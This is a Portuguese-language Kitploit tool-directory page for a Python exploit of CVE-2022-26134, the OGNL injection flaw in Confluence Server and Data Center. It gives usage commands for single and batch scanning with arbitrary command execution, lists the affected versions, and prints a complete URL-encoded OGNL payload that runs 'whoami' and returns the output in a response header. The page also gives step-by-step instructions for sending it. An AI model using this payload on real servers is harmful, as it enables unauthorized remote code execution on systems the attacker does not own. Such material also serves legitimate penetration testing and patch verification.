Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134 — Exploit baseado em Python para CVE-2022-26134, uma vulnerabilidade de injeção OGNL no Confluence Server and Data Center. Suporta verificação de URL única e varredura em lote com execução arbitrária de comandos. | Kitploit
Ferramentas/GitHubGitHub/ytxzx/cve-2022-26134
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e Controle
GitHubytxzx/cve-2022-26134

CVE-2022-26134

Exploit baseado em Python para CVE-2022-26134, uma vulnerabilidade de injeção OGNL no Confluence Server and Data Center. Suporta verificação de URL única e varredura em lote com execução arbitrária de comandos.

Ver Repositório
3há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26134 - Confluence OGNL injection vulnerability

Uso do script

Instalar bibliotecas Python

pip install -r requirements.txt

Verificação de vulnerabilidade

python3 CVE-2022-26134_check.py -u url -c whoami

image

Varredura em lote

python3 CVE-2022-26134_check.py -f url.txt -c whoami

image

Versões afetadas

Confluence Server and Data Center >= 1.3.0

Confluence Server and Data Center < 7.4.17

Confluence Server and Data Center < 7.13.7

Confluence Server and Data Center < 7.14.3

Confluence Server and Data Center < 7.15.2

Confluence Server and Data Center < 7.16.4

Confluence Server and Data Center < 7.17.4

Confluence Server and Data Center < 7.18.1

Exploração da vulnerabilidade

payload:

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/

Acesse o serviço Confluence, capture um pacote com código de retorno 302, envie o pacote contendo o payload. No pacote de resposta, o parâmetro X-Qualys-Response retornará o nome de usuário atual do servidor.

image

Princípio da vulnerabilidade

A URI fornecida pelo atacante é convertida em um namespace, e este namespace é então convertido em uma expressão OGNL para ser avaliada (a URL fornecida pelo atacante é indiretamente transformada em uma expressão OGNL para cálculo).

Baixar ferramenta